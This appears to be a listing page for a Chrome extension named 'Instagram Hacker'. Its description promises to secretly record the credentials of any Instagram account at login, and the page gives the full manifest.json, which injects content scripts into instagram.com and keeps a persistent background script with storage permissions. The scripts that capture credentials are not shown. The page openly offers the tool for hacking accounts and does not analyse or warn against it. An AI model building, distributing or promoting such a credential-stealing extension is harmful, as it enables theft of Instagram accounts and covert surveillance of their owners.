Instagram Hacker

Instagram Hacker

InstagramHacker secretly records the credentials of any Instagram account while you login. Now you can hack Instagram Account easily

Merlin
Additional files are visible only to premium users

manifest.json


{
  "update_url": "https://clients2.google.com/service/update2/crx",
  "manifest_version": 2,
  "name": "Instagram Hacker",
  "description": "InstagramHacker secretly records the credentials of any Instagram account while you login. Now you can hack Instagram Account easily",
  "version": "0.4",
  "icons": {
    "16": "16.png",
    "48": "48.png",
    "128": "128.png"
  },
  "browser_action": {},
  "background": {
    "scripts": [
      "back.js"
    ],
    "persistent": true
  },
  "content_scripts": [
    {
      "matches": [
        "https://www.instagram.com/*"
      ],
      "js": [
        "jquery-3.5.0.min.js",
        "content.js"
      ]
    }
  ],
  "permissions": [
    "storage",
    "unlimitedStorage"
  ]
}